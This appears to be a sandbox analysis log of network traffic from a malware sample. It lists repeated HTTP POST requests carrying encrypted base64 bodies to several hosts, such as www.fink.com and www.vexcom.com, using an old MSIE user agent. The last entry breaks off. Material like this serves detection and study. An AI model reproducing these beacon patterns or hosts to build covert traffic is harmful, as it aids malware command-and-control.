                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 4f 65 47 69 74 38 42 5a 50 42 5a 7a 77 31 44 4c 6b 77 49 43 4c 66 4e 71 61 49 65 6f 32 79 37 32 39 4d 7a 6b 34 77 76 43 6f 6c 4a 68 41 63 55 4c 48 69 47 70 34 46 2b 2f 75 53 4e 37 6a 70 76 6b 58 2f 2f 6a 38 34 48 79 6a 62 54 74 37 38 7a 47 30 4f 75 34 71 59 47 58 75 53 59 73 6a 77 4a 73 78 69 32 64 51 58 58 2b 70 74 57 44 77 66 4f 68 68 66 41 57 53 47 4b 75 39 38 48 4a 70 76 6c 38 78 4c 62 59 4a 50 78 37 48 62 71 30 75 35 61 33 46 4e 51 31 54 57 63 6e 7a 41 67 6e 59 50 44 30 59 37 6e 4b 72 6e 72 31 36 6e 71 62 56 2b 50 68 77 73 6e 61 78 33 52 56 2b 6f 62 31 33 50 2f 68 43 42 51 72 2f 44 50 30 67 47 6d 78 53 72 43 4d 53 49 34 57 64 71 73 57 75 76 54 4b 31 64 41 41 48 35 7a 34 74 6d 74 31 55 46 6a 6f 30 76 75 63 2b 4d 4e 4c 57 4c 67 34 32 47 6f 68 68 4b 32 45 64 33 31 6c 72 39 62 4c 43 59 70 74 65 49 50 73 61 62 52 69 70 6c 57 45 51 6d 4c 69 62 33 65 6a 2f 4c 74 4c 4b 34 6c 36 42 58 56 33 2b 38 4b 78 6b 6d 37 77 41 63 49 32 77 46 67 49 6d 47 65 78 75 54 73 36 61 64 6e 6f 63 47 4f 68 38 62 46 39 4a 79 48 78 41 73 63 54 30 44 6d 53 78 59 4d 53 45 32 63 4a 47 76 78 33 4d 64 5a 41 56 31 39 37 55 2b 63 4f 53 38 58 7a 79 5a 75 54 36 64 62 55 62 77 4a 59 34 57 4e 54 51 47 61 4b 6d 31 74 51 53 64 58 62 4c 30 65 5a 46 56 46 37 78 55 31 55 2b 4d 55 4f 32 38 47 67 4c 6a 34 77 30 69 77 56 2b 72 57 38 68 35 5a 78 33 4d 39 63 66 31 46 43 33 62 55 4c 4c 2b 54 39 34 45 75 62 52 33 42 73 30 68 55 61 61 38 37 2b 66 67 44 4b 61 58 47 63 6f 75 47 34 73 73 52 32 59 78 73 50 51 55 50 54 4d 34 55 35 47 74 72 57 54 67 6b 67 34 4a 6b 6d 59 75 6d 30 41 48 76 6e 64 4b 32 43 2f 68 36 6b 6a 56 6a 54 50 35 36 74 71 35 71 62 69 6f 6e 56 48 54 42 72 46 5a 63 30 4e 35 38 2f 77 48 78 53 77 4a 46 6e 44 74 39 49 54 64 2f 57 77 75 6d 4a 56 41 53 33 69 53 30 3d Data Ascii: OeGit8BZPBZzw1DLkwICLfNqaIeo2y729Mzk4wvColJhAcULHiGp4F+/uSN7jpvkX//j84HyjbTt78zG0Ou4qYGXuSYsjwJsxi2dQXX+ptWDwfOhhfAWSGKu98HJpvl8xLbYJPx7Hbq0u5a3FNQ1TWcnzAgnYPD0Y7nKrnr16nqbV+Phwsnax3RV+ob13P/hCBQr/DP0gGmxSrCMSI4WdqsWuvTK1dAAH5z4tmt1UFjo0vuc+MNLWLg42GohhK2Ed31lr9bLCYpteIPsabRiplWEQmLib3ej/LtLK4l6BXV3+8Kxkm7wAcI2wFgImGexuTs6adnocGOh8bF9JyHxAscT0DmSxYMSE2cJGvx3MdZAV197U+cOS8XzyZuT6dbUbwJY4WNTQGaKm1tQSdXbL0eZFVF7xU1U+MUO28GgLj4w0iwV+rW8h5Zx3M9cf1FC3bULL+T94EubR3Bs0hUaa87+fgDKaXGcouG4ssR2YxsPQUPTM4U5GtrWTgkg4JkmYum0AHvndK2C/h6kjVjTP56tq5qbionVHTBrFZc0N58/wHxSwJFnDt9ITd/WwumJVAS3iS0=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 62 47 33 74 4f 70 51 71 35 52 56 42 46 73 47 58 62 78 52 39 30 4f 64 32 52 72 4d 4d 37 77 7a 55 43 46 6b 6c 4c 35 72 54 70 68 33 52 6b 68 2f 35 4f 31 4a 57 49 6c 75 53 76 49 6a 41 4f 67 5a 6c 72 32 48 77 33 6a 42 76 73 79 46 6b 76 79 75 55 69 59 57 7a 63 38 32 52 66 6b 6f 47 2f 51 6e 6e 4c 49 53 64 4a 61 73 74 53 31 52 4a 31 6c 7a 48 46 6f 53 73 56 50 4e 66 6d 32 71 45 75 7a 46 51 42 64 61 57 65 68 4c 63 56 33 41 66 4c 39 2f 74 31 4f 2b 4b 62 58 2b 59 73 39 68 57 45 44 49 58 79 61 4a 61 55 67 49 43 34 56 4c 64 6f 31 33 57 70 48 50 4c 44 36 74 2f 2f 46 31 4c 6f 58 37 58 63 6d 77 74 41 72 75 4d 6e 70 48 44 74 4b 56 50 76 76 70 6f 4d 53 51 5a 50 4e 48 5a 48 6e 54 71 2f 59 6f 42 4f 75 68 74 48 6d 61 67 49 67 45 6d 71 49 31 77 2b 30 48 41 46 51 2b 4d 74 42 76 67 76 67 6a 35 70 33 65 63 30 79 70 39 4a 50 47 52 64 4a 63 42 66 45 59 6c 51 32 31 50 6a 44 36 62 36 41 4f 4f 68 75 70 6b 46 4a 43 6f 56 64 61 4c 78 7a 35 53 49 51 48 51 30 6d 79 38 77 58 4c 35 39 4e 2b 4c 59 6f 75 62 6b 6d 58 67 75 39 49 64 38 68 59 4b 6c 38 33 36 72 6b 2f 32 46 53 76 64 4c 47 36 73 6d 4b 66 4b 6c 5a 4d 6b 70 61 6b 68 33 37 51 62 6c 52 74 57 48 7a 66 35 58 66 52 5a 71 2f 66 4e 4a 6a 7a 7a 35 33 6b 6d 31 37 6f 66 39 61 43 52 44 57 6d 56 31 43 56 4a 42 56 72 72 6f 35 67 69 36 45 76 36 48 73 49 36 73 47 69 44 31 4b 54 6a 68 66 77 51 6b 75 46 44 64 43 50 6f 36 77 49 67 4a 73 6f 74 45 31 54 35 7a 6a 74 57 78 6b 70 6f 42 6e 4b 64 4f 46 76 36 4c 6b 35 4f 44 46 58 64 4d 52 42 31 43 78 38 6e 53 55 44 36 61 6d 7a 76 64 70 54 69 59 74 6c 43 66 79 74 67 55 4e 4b 54 41 53 5a 6b 31 75 70 5a 46 67 6d 39 4c 59 75 43 62 54 2b 30 Data Ascii: bG3tOpQq5RVBFsGXbxR90Od2RrMM7wzUCFklL5rTph3Rkh/5O1JWIluSvIjAOgZlr2Hw3jBvsyFkvyuUiYWzc82RfkoG/QnnLISdJastS1RJ1lzHFoSsVPNfm2qEuzFQBdaWehLcV3AfL9/t1O+KbX+Ys9hWEDIXyaJaUgIC4VLdo13WpHPLD6t//F1LoX7XcmwtAruMnpHDtKVPvvpoMSQZPNHZHnTq/YoBOuhtHmagIgEmqI1w+0HAFQ+MtBvgvgj5p3ec0yp9JPGRdJcBfEYlQ21PjD6b6AOOhupkFJCoVdaLxz5SIQHQ0my8wXL59N+LYoubkmXgu9Id8hYKl836rk/2FSvdLG6smKfKlZMkpakh37QblRtWHzf5XfRZq/fNJjzz53km17of9aCRDWmV1CVJBVrro5gi6Ev6HsI6sGiD1KTjhfwQkuFDdCPo6wIgJsotE1T5zjtWxkpoBnKdOFv6Lk5ODFXdMRB1Cx8nSUD6amzvdpTiYtlCfytgUNKTASZk1upZFgm9LYuCbT+0
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 64 63 5a 46 61 43 52 58 59 78 59 72 30 77 77 59 76 37 69 32 64 76 65 64 46 51 37 63 66 6b 6f 77 6d 49 37 6a 63 4e 52 67 64 58 4b 6e 63 4f 6b 31 4a 69 33 78 6d 39 74 76 4a 4d 4c 44 5a 4d 39 43 59 70 35 73 34 63 4b 79 51 6a 35 61 36 54 6f 54 75 31 45 34 67 44 71 56 48 62 4e 7a 35 30 30 56 59 50 42 2b 64 77 7a 4c 46 71 6e 31 65 72 6a 65 42 4a 70 45 6f 6f 7a 4f 6f 70 43 66 55 33 50 4f 46 51 37 6f 54 34 6e 71 76 53 55 78 71 49 6c 6b 33 47 69 6e 36 73 62 77 79 2b 56 48 41 2b 51 39 53 63 42 45 30 72 37 77 74 44 35 49 53 50 64 4f 31 49 4f 44 71 66 31 50 50 57 67 56 70 62 5a 69 35 31 4b 69 72 33 4b 71 37 65 4e 41 52 66 48 34 35 6c 4c 47 69 79 56 52 38 4d 52 52 33 51 43 72 53 66 4e 49 56 59 50 44 78 48 2b 45 53 6d 64 32 6a 75 76 4d 43 5a 59 4a 73 38 6f 6d 76 75 41 34 33 69 42 7a 57 31 6a 71 77 66 38 54 6d 7a 4f 69 33 50 58 6c 32 53 7a 4c 37 51 31 4d 75 75 66 58 31 76 41 68 77 43 69 76 70 4a 48 56 73 74 66 49 64 45 4c 59 52 73 54 54 41 6f 77 6a 71 47 35 50 6d 2b 79 78 77 55 6c 62 32 77 31 33 79 71 7a 52 4a 78 38 47 49 6e 66 6f 4d 54 6d 4c 7a 64 78 71 67 32 66 37 31 42 39 34 76 70 7a 6c 6c 53 5a 70 73 59 62 4a 6c 4d 72 59 43 52 4b 37 55 76 2b 32 48 66 46 4c 38 75 50 52 7a 65 45 67 75 56 73 54 35 6b 61 2f 2f 67 4e 6c 50 57 37 69 49 58 59 41 41 66 65 45 70 64 31 42 6e 79 65 6e 32 55 43 72 65 4c 38 30 47 52 71 4a 7a 66 78 6a 44 53 66 67 73 61 6a 64 6e 64 48 58 45 53 35 31 37 4f 58 39 76 36 56 68 4e 4e 36 51 50 43 76 45 42 59 4b 6a 65 57 36 71 50 34 4c 59 39 59 6e 6a 4a 48 4d 67 33 49 39 37 61 38 2b 6a 73 33 42 2b 70 6e 30 4b 32 77 71 74 7a 4a 4d 32 6d 59 35 47 54 41 3d 3d Data Ascii: dcZFaCRXYxYr0wwYv7i2dvedFQ7cfkowmI7jcNRgdXKncOk1Ji3xm9tvJMLDZM9CYp5s4cKyQj5a6ToTu1E4gDqVHbNz500VYPB+dwzLFqn1erjeBJpEoozOopCfU3POFQ7oT4nqvSUxqIlk3Gin6sbwy+VHA+Q9ScBE0r7wtD5ISPdO1IODqf1PPWgVpbZi51Kir3Kq7eNARfH45lLGiyVR8MRR3QCrSfNIVYPDxH+ESmd2juvMCZYJs8omvuA43iBzW1jqwf8TmzOi3PXl2SzL7Q1MuufX1vAhwCivpJHVstfIdELYRsTTAowjqG5Pm+yxwUlb2w13yqzRJx8GInfoMTmLzdxqg2f71B94vpzllSZpsYbJlMrYCRK7Uv+2HfFL8uPRzeEguVsT5ka//gNlPW7iIXYAAfeEpd1Bnyen2UCreL80GRqJzfxjDSfgsajdndHXES517OX9v6VhNN6QPCvEBYKjeW6qP4LY9YnjJHMg3I97a8+js3B+pn0K2wqtzJM2mY5GTA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 4f 65 47 69 74 38 42 5a 50 42 5a 7a 77 31 44 4c 6b 77 49 43 4c 66 4e 71 61 49 65 6f 32 79 37 32 39 4d 7a 6b 34 77 76 43 6f 6c 4a 68 41 63 55 4c 48 69 47 70 34 46 2b 2f 75 53 4e 37 6a 70 76 6b 58 2f 2f 6a 38 34 48 79 6a 62 54 74 37 38 7a 47 30 4f 75 34 71 59 47 58 75 53 59 73 6a 77 4a 73 78 69 32 64 51 58 58 2b 70 74 57 44 77 66 4f 68 68 66 41 57 53 47 4b 75 39 38 48 4a 70 76 6c 38 78 4c 62 59 4a 50 78 37 48 62 71 30 75 35 61 33 46 4e 51 31 54 57 63 6e 7a 41 67 6e 59 50 44 30 59 37 6e 4b 72 6e 72 31 36 6e 71 62 56 2b 50 68 77 73 6e 61 78 33 52 56 2b 6f 62 31 33 50 2f 68 43 42 51 72 2f 44 50 30 67 47 6d 78 53 72 43 4d 53 49 34 57 64 71 73 57 75 76 54 4b 31 64 41 41 48 35 7a 34 74 6d 74 31 55 46 6a 6f 30 76 75 63 2b 4d 4e 4c 57 4c 67 34 32 47 6f 68 68 4b 32 45 64 33 31 6c 72 39 62 4c 43 59 70 74 65 49 50 73 61 62 52 69 70 6c 57 45 51 6d 4c 69 62 33 65 6a 2f 4c 74 4c 4b 34 6c 36 42 58 56 33 2b 38 4b 78 6b 6d 37 77 41 63 49 32 77 46 67 49 6d 47 65 78 75 54 73 36 61 64 6e 6f 63 47 4f 68 38 62 46 39 4a 79 48 78 41 73 63 54 30 44 6d 53 78 59 4d 53 45 32 63 4a 47 76 78 33 4d 64 5a 41 56 31 39 37 55 2b 63 4f 53 38 58 7a 79 5a 75 54 36 64 62 55 62 77 4a 59 34 57 4e 54 51 47 61 4b 6d 31 74 51 53 64 58 62 4c 30 65 5a 46 56 46 37 78 55 31 55 2b 4d 55 4f 32 38 47 67 4c 6a 34 77 30 69 77 56 2b 72 57 38 68 35 5a 78 33 4d 39 63 66 31 46 43 33 62 55 4c 4c 2b 54 39 34 45 75 62 52 33 42 73 30 68 55 61 61 38 37 2b 66 67 44 4b 61 58 47 63 6f 75 47 34 73 73 52 32 59 78 73 50 51 55 50 54 4d 34 55 35 47 74 72 57 54 67 6b 67 34 4a 6b 6d 59 75 6d 30 41 48 76 6e 64 4b 32 43 2f 68 36 6b 6a 56 6a 54 50 35 36 74 71 35 71 62 69 6f 6e 56 48 54 42 72 46 5a 63 30 4e 35 38 2f 77 48 78 53 77 4a 46 6e 44 74 39 49 54 64 2f 57 77 75 6d 4a 56 41 53 33 69 53 30 3d Data Ascii: OeGit8BZPBZzw1DLkwICLfNqaIeo2y729Mzk4wvColJhAcULHiGp4F+/uSN7jpvkX//j84HyjbTt78zG0Ou4qYGXuSYsjwJsxi2dQXX+ptWDwfOhhfAWSGKu98HJpvl8xLbYJPx7Hbq0u5a3FNQ1TWcnzAgnYPD0Y7nKrnr16nqbV+Phwsnax3RV+ob13P/hCBQr/DP0gGmxSrCMSI4WdqsWuvTK1dAAH5z4tmt1UFjo0vuc+MNLWLg42GohhK2Ed31lr9bLCYpteIPsabRiplWEQmLib3ej/LtLK4l6BXV3+8Kxkm7wAcI2wFgImGexuTs6adnocGOh8bF9JyHxAscT0DmSxYMSE2cJGvx3MdZAV197U+cOS8XzyZuT6dbUbwJY4WNTQGaKm1tQSdXbL0eZFVF7xU1U+MUO28GgLj4w0iwV+rW8h5Zx3M9cf1FC3bULL+T94EubR3Bs0hUaa87+fgDKaXGcouG4ssR2YxsPQUPTM4U5GtrWTgkg4JkmYum0AHvndK2C/h6kjVjTP56tq5qbionVHTBrFZc0N58/wHxSwJFnDt9ITd/WwumJVAS3iS0=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 524User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 53 52 2f 2f 53 46 44 6b 69 78 61 6e 6f 70 64 68 34 32 74 52 61 67 4f 67 4e 70 46 34 6b 66 4d 79 68 48 41 4a 5a 53 4d 31 41 32 44 38 49 32 43 30 50 6d 4a 6f 46 76 33 48 77 46 6c 49 55 6d 51 42 6e 35 54 72 32 6d 69 6d 35 77 6f 59 42 78 6a 4a 64 78 30 32 36 48 6c 42 53 4e 78 58 54 4f 35 76 5a 66 69 6f 78 64 56 62 59 6d 43 47 71 77 45 4f 36 33 6e 34 70 4c 61 35 30 75 47 31 7a 5a 30 30 52 6e 37 4e 32 67 42 58 70 57 71 4e 42 46 4e 4d 71 37 4c 56 37 67 61 4e 69 63 6b 46 43 2f 62 72 59 4b 51 6e 47 7a 49 51 45 56 53 46 71 35 62 42 51 6e 51 59 6f 78 4e 79 34 7a 41 35 64 33 59 69 31 37 79 2f 61 4d 75 67 37 4d 4a 2f 37 6f 52 79 37 56 74 37 4b 57 63 73 33 4b 2f 53 47 6a 6a 37 44 50 36 55 78 44 30 4f 6a 68 37 68 43 38 53 43 44 7a 4a 45 6c 33 38 35 51 47 6d 47 2b 6d 48 2f 62 72 52 74 45 5a 43 34 47 30 75 66 6d 61 38 4a 4d 67 42 49 57 32 50 6e 4b 51 47 6c 34 46 77 5a 59 66 42 66 4b 76 67 31 36 48 4f 4e 41 78 30 69 66 51 52 7a 75 75 4a 59 31 64 4d 42 6c 6a 73 6b 47 69 79 45 6c 4e 56 5a 49 79 66 57 50 34 6e 73 49 62 6d 31 77 46 4c 4a 41 57 4f 35 61 49 33 35 47 38 6a 4e 7a 59 32 42 41 69 39 46 53 58 6b 4b 6c 37 62 4f 2f 68 31 32 43 69 74 78 4e 41 43 69 4f 51 68 4d 44 4e 69 66 62 55 66 50 4a 6d 63 70 57 68 6f 30 31 30 5a 49 37 37 79 65 33 32 64 59 51 57 57 5a 6e 30 59 2b 61 2f 79 55 56 50 78 58 38 62 59 70 33 31 38 79 6d 32 31 74 74 37 75 54 68 65 79 4c 56 4e 75 54 47 69 56 6a 4b 36 6a 4c 54 2f 4b 68 67 36 45 79 66 70 42 33 78 76 57 6b 38 31 71 6c 53 33 47 75 2f 74 36 54 4c 49 67 37 2f 56 78 68 48 33 4b 36 70 52 69 66 65 35 50 6e 57 65 54 36 68 69 43 77 47 46 67 3d Data Ascii: SR//SFDkixanopdh42tRagOgNpF4kfMyhHAJZSM1A2D8I2C0PmJoFv3HwFlIUmQBn5Tr2mim5woYBxjJdx026HlBSNxXTO5vZfioxdVbYmCGqwEO63n4pLa50uG1zZ00Rn7N2gBXpWqNBFNMq7LV7gaNickFC/brYKQnGzIQEVSFq5bBQnQYoxNy4zA5d3Yi17y/aMug7MJ/7oRy7Vt7KWcs3K/SGjj7DP6UxD0Ojh7hC8SCDzJEl385QGmG+mH/brRtEZC4G0ufma8JMgBIW2PnKQGl4FwZYfBfKvg16HONAx0ifQRzuuJY1dMBljskGiyElNVZIyfWP4nsIbm1wFLJAWO5aI35G8jNzY2BAi9FSXkKl7bO/h12CitxNACiOQhMDNifbUfPJmcpWho010ZI77ye32dYQWWZn0Y+a/yUVPxX8bYp318ym21tt7uTheyLVNuTGiVjK6jLT/Khg6EyfpB3xvWk81qlS3Gu/t6TLIg7/VxhH3K6pRife5PnWeT6hiCwGFg=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 75 41 41 5a 58 6b 54 7a 65 78 61 51 72 6e 42 4b 58 32 56 4c 68 52 63 7a 63 50 31 38 58 64 61 5a 75 4e 7a 55 6e 74 68 42 4c 73 42 4a 4e 52 41 63 43 6f 4a 49 6b 70 55 68 73 4e 46 5a 32 55 33 58 55 56 5a 6d 2b 50 61 4c 54 55 37 76 61 35 53 63 4a 4f 6d 44 70 71 44 70 5a 54 44 4f 62 75 30 59 4a 42 6e 6d 54 69 55 62 74 2f 4c 61 53 64 54 35 77 4d 73 36 70 2f 6d 68 66 58 48 6c 69 55 56 53 44 4b 57 45 43 4c 74 59 68 49 6d 77 64 66 37 77 51 53 6b 2f 58 70 43 6c 76 58 6a 58 4f 4a 74 4a 50 47 73 4f 76 54 34 38 69 41 42 44 45 51 58 32 6e 77 41 70 42 62 67 49 4f 48 4a 71 62 6c 65 59 67 2f 2b 69 41 43 4b 6c 5a 55 6e 45 32 53 78 41 57 48 62 76 64 4f 52 67 6b 75 62 55 32 51 50 34 4d 7a 33 31 2f 32 66 34 75 50 46 50 61 44 39 53 64 58 45 43 44 59 66 4c 58 2b 71 52 36 4f 65 64 34 36 6b 56 4c 74 55 53 35 54 65 49 36 4b 43 36 6f 5a 31 32 4e 78 43 65 77 4a 37 66 39 69 48 6d 70 57 57 46 59 4f 34 55 6d 67 4c 6a 72 53 51 53 38 62 70 79 6b 4c 32 48 2f 45 6f 58 72 30 67 66 36 35 31 2b 64 39 36 57 4b 43 6d 52 77 66 61 4b 48 75 54 38 32 45 4c 70 30 6b 64 37 75 6b 30 64 78 47 69 32 4b 6b 6a 68 55 63 36 7a 4f 6c 68 30 56 6b 5a 46 49 65 52 4e 55 73 32 36 72 61 44 59 75 38 39 74 49 52 2b 6a 41 5a 76 33 34 62 74 4b 62 35 49 4f 42 31 45 2b 6f 31 43 31 70 64 35 77 54 4c 64 6e 57 75 72 55 59 66 41 6e 65 41 44 4e 69 35 2b 38 6a 42 78 4c 53 75 76 51 47 51 32 69 54 65 4b 4b 46 43 68 31 30 31 38 33 61 55 4e 4c 48 64 43 54 4e 68 6f 50 51 2f 67 46 53 77 79 55 55 31 76 34 63 4a 30 49 70 48 56 34 45 69 69 54 78 51 31 78 34 78 79 68 71 72 6a 6c 66 34 50 36 55 39 6b 2f 45 4d 6c 2b 4a 67 6e 50 6a 38 45 5a 75 64 57 4b 79 4b 32 57 36 47 66 66 6d 78 58 43 71 46 4a 78 4a 70 59 44 4f 67 4b 32 4c 46 56 6e 47 6d 36 69 2f 41 49 36 6f 31 6e 65 48 72 6a 6a 76 68 6f 59 4a 45 71 52 6e 78 74 36 6d 74 47 66 43 61 45 31 61 77 3d 3d Data Ascii: uAAZXkTzexaQrnBKX2VLhRczcP18XdaZuNzUnthBLsBJNRAcCoJIkpUhsNFZ2U3XUVZm+PaLTU7va5ScJOmDpqDpZTDObu0YJBnmTiUbt/LaSdT5wMs6p/mhfXHliUVSDKWECLtYhImwdf7wQSk/XpClvXjXOJtJPGsOvT48iABDEQX2nwApBbgIOHJqbleYg/+iACKlZUnE2SxAWHbvdORgkubU2QP4Mz31/2f4uPFPaD9SdXECDYfLX+qR6Oed46kVLtUS5TeI6KC6oZ12NxCewJ7f9iHmpWWFYO4UmgLjrSQS8bpykL2H/EoXr0gf651+d96WKCmRwfaKHuT82ELp0kd7uk0dxGi2KkjhUc6zOlh0VkZFIeRNUs26raDYu89tIR+jAZv34btKb5IOB1E+o1C1pd5wTLdnWurUYfAneADNi5+8jBxLSuvQGQ2iTeKKFCh10183aUNLHdCTNhoPQ/gFSwyUU1v4cJ0IpHV4EiiTxQ1x4xyhqrjlf4P6U9k/EMl+JgnPj8EZudWKyK2W6GffmxXCqFJxJpYDOgK2LFVnGm6i/AI6o1neHrjjvhoYJEqRnxt6mtGfCaE1aw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tyrns.comCache-Control: no-cacheData Raw: 6d 79 52 5a 4d 73 66 58 67 68 61 4a 76 70 74 75 39 6a 4a 38 6c 5a 41 64 78 44 32 39 4f 79 47 5a 36 37 2f 5a 64 30 74 51 51 58 55 79 4c 6f 68 70 45 30 43 61 72 6d 6e 56 35 77 39 4d 6c 49 6f 43 33 32 77 34 63 57 33 57 44 58 74 51 64 53 76 58 36 4f 61 64 31 30 42 34 64 76 77 38 44 53 2f 52 56 4f 32 2f 52 68 78 4d 6e 6a 44 57 78 73 47 6c 53 6a 71 47 74 70 4f 57 4c 68 6b 32 39 39 75 44 46 45 35 41 4a 35 6c 55 76 64 74 4f 4a 56 7a 44 38 72 6a 67 68 6d 50 6f 66 63 50 59 36 58 6e 75 69 55 52 76 33 6b 69 2f 54 4f 69 52 4d 4e 33 4f 34 36 44 53 72 48 6d 59 5a 77 4f 67 71 62 77 34 52 77 39 5a 4c 36 77 43 59 70 4a 30 4a 54 78 62 77 6a 79 4a 30 37 30 74 4a 30 76 32 75 39 45 63 37 75 49 30 78 33 50 34 6f 79 34 44 30 65 39 70 36 64 57 5a 65 46 38 31 6e 6c 73 7a 38 62 61 6d 64 67 57 6b 79 76 38 74 42 50 47 50 75 6e 78 46 55 51 66 2f 69 71 71 69 41 6d 57 7a 62 59 2b 47 7a 4c 63 52 6d 42 63 53 4d 72 4e 70 6e 66 50 30 42 75 53 62 52 73 79 7a 51 55 67 31 79 73 31 54 64 6c 58 55 4a 43 47 6e 70 50 56 6a 4d 4c 69 44 42 62 6c 55 7a 49 30 52 32 45 39 36 56 31 44 2f 56 38 34 64 4b 4f 69 45 41 79 4b 73 55 41 67 36 77 53 6f 6a 69 74 7a 56 4d 54 58 6a 59 4e 73 33 2b 32 79 37 67 62 32 6a 61 51 47 66 76 31 5a 4d 77 73 5a 43 57 59 64 34 4e 4d 67 44 35 53 4a 61 48 32 4d 74 32 78 77 32 59 67 56 79 31 79 73 36 6d 62 2b 63 42 53 75 5a 6f 46 45 5a 6a 4c 63 4a 41 32 31 72 41 58 51 69 74 70 6a 6f 6c 44 6e 51 59 4a 47 67 41 66 4e 49 4d 4b 67 36 4e 7a 79 79 4c 37 49 73 78 5a 44 69 43 6b 66 51 72 42 2f 30 77 67 6f 35 72 78 67 43 44 76 4c 6a 55 37 59 62 6b 78 70 38 52 2f 35 2f 6d 2f 5a 59 35 4e 41 6c 72 77 3d 3d Data Ascii: myRZMsfXghaJvptu9jJ8lZAdxD29OyGZ67/Zd0tQQXUyLohpE0CarmnV5w9MlIoC32w4cW3WDXtQdSvX6Oad10B4dvw8DS/RVO2/RhxMnjDWxsGlSjqGtpOWLhk299uDFE5AJ5lUvdtOJVzD8rjghmPofcPY6XnuiURv3ki/TOiRMN3O46DSrHmYZwOgqbw4Rw9ZL6wCYpJ0JTxbwjyJ070tJ0v2u9Ec7uI0x3P4oy4D0e9p6dWZeF81nlsz8bamdgWkyv8tBPGPunxFUQf/iqqiAmWzbY+GzLcRmBcSMrNpnfP0BuSbRsyzQUg1ys1TdlXUJCGnpPVjMLiDBblUzI0R2E96V1D/V84dKOiEAyKsUAg6wSojitzVMTXjYNs3+2y7gb2jaQGfv1ZMwsZCWYd4NMgD5SJaH2Mt2xw2YgVy1ys6mb+cBSuZoFEZjLcJA21rAXQitpjolDnQYJGgAfNIMKg6NzyyL7IsxZDiCkfQrB/0wgo5rxgCDvLjU7Ybkxp8R/5/m/ZY5NAlrw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 38 65 59 4c 74 4f 67 37 50 42 59 43 79 4e 58 34 71 32 34 45 4e 31 73 58 57 34 33 77 6a 46 72 4b 6e 44 33 4e 46 57 6e 56 6f 58 35 50 6a 44 31 2b 62 31 6f 69 59 65 63 53 42 68 4c 2f 30 74 69 52 35 6e 6a 48 74 68 34 4d 5a 49 78 78 56 4b 74 42 76 53 45 58 49 55 65 53 71 72 52 77 50 4b 33 49 50 78 4f 33 51 55 4f 57 79 6e 6b 72 69 39 75 44 5a 61 45 6a 4d 35 67 72 38 72 56 6c 2f 53 50 6e 39 41 46 44 64 37 35 73 43 71 68 2f 66 73 67 31 7a 6e 79 79 68 79 31 51 48 30 74 45 7a 59 2b 73 61 51 32 31 6e 30 69 6f 48 43 51 6d 4d 4d 36 77 5a 49 79 62 33 6c 63 59 41 47 61 43 79 5a 30 4e 6e 4c 64 67 35 7a 6a 6d 58 4c 37 50 6f 34 78 36 2f 6f 56 68 78 4f 38 77 59 2b 72 7a 47 67 55 69 7a 78 34 43 42 6e 48 6e 6b 54 36 4c 47 44 32 55 4e 49 75 75 61 4d 78 4d 33 58 4d 31 79 4c 51 78 30 79 66 34 45 58 39 51 6a 43 4a 33 70 2b 55 46 68 61 41 56 76 50 38 2f 2f 55 75 69 56 42 33 49 4a 55 44 64 4d 79 30 49 48 76 56 78 4a 69 44 45 4c 34 36 56 31 37 37 62 4c 6d 46 74 35 35 38 44 58 65 50 44 50 73 7a 42 50 37 56 34 4d 4c 50 6a 47 4c 6d 63 63 54 4b 57 61 30 6d 69 47 50 75 63 49 37 74 7a 6d 47 69 49 6d 4e 4d 4b 44 58 37 79 41 47 65 54 4f 30 75 64 48 61 4f 45 52 6d 75 58 52 31 6f 78 63 76 72 76 50 52 49 4c 4b 66 46 52 33 70 61 5a 59 50 54 58 65 2b 4d 67 63 71 54 61 76 54 37 2b 31 77 4d 4d 55 31 79 6f 79 48 31 69 31 4f 58 36 68 71 73 6f 42 4e 63 44 42 73 79 62 70 58 72 77 75 6f 55 76 6a 7a 2f 67 2f 4a 47 72 37 55 58 70 45 48 44 76 52 4f 59 77 6a 34 33 2b 36 30 65 38 74 45 45 57 51 59 33 71 31 61 79 43 77 4b 44 59 6e 49 64 4b 58 78 7a 35 32 75 30 77 41 55 77 47 5a 33 6a 56 31 64 38 2f 4f 31 64 48 42 4e 32 77 Data Ascii: 